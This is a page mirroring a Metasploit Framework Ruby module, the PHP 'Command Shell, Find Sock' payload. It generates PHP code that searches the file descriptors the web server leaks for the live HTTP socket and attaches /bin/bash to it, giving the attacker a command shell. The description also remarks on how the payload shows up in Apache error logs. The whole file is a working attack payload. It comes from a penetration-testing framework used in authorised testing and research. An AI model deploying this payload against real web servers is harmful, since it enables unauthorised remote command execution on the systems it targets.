Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/php/shell_findsock.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = :dynamic

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Php

11
  include Msf::Sessions::CommandShellOptions

12


13
  def initialize(info = {})

14
    super(

15
      merge_info(

16
        info,

17
        'Name' => 'PHP Command Shell, Find Sock',

18
        'Description' => %q{

19
          Spawn a shell on the established connection to

20
          the webserver.  Unfortunately, this payload

21
          can leave conspicuous evil-looking entries in the

22
          apache error logs, so it is probably a good idea

23
          to use a bind or reverse shell unless firewalls

24
          prevent them from working.  The issue this

25
          payload takes advantage of (CLOEXEC flag not set

26
          on sockets) appears to have been patched on the

27
          Ubuntu version of Apache and may not work on

28
          other Debian-based distributions.  Only tested on

29
          Apache but it might work on other web servers

30
          that leak file descriptors to child processes.

31
        },

32
        'Author' => [ 'egypt' ],

33
        'License' => BSD_LICENSE,

34
        'Platform' => 'php',

35
        'Handler' => Msf::Handler::FindShell,

36
        'Session' => Msf::Sessions::CommandShell,

37
        'Arch' => ARCH_PHP

38
      )

39
    )

40
  end

41


42
  def php_findsock

43
    vars = Rex::RandomIdentifier::Generator.new

44
    var_cmd = '$' + vars[:var_cmd]

45
    var_fd = '$' + vars[:var_fd]

46
    var_out = '$' + vars[:var_out]

47
    var_dis = '$' + vars[:var_dis]

48
    shell = <<~END_OF_PHP_CODE

49
      #{php_preamble(disabled_varname: var_dis)}

50
      print("<html><body>");

51
      flush();

52


53
      function mysystem(#{var_cmd}){

54
        #{php_system_block(disabled_varname: var_dis, cmd_varname: var_cmd, output_varname: var_out)}

55
        return #{var_out};

56
      }

57


58
      #{var_fd} = 13;

59
      for ($i = 3; $i < 50; $i++) {

60
        $foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");

61
        if ($foo != $i) {

62
          #{var_fd} = $i - 1;

63
          break;

64
        }

65
      }

66
      print("</body></html>\n\n");

67
      flush();

68


69
      #{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";

70
      mysystem(#{var_cmd});

71


72
    END_OF_PHP_CODE

73


74
    return shell

75
  end

76


77
  #

78
  # Constructs the payload

79
  #

80
  def generate(_opts = {})

81
    return php_findsock

82
  end

83
end

84


85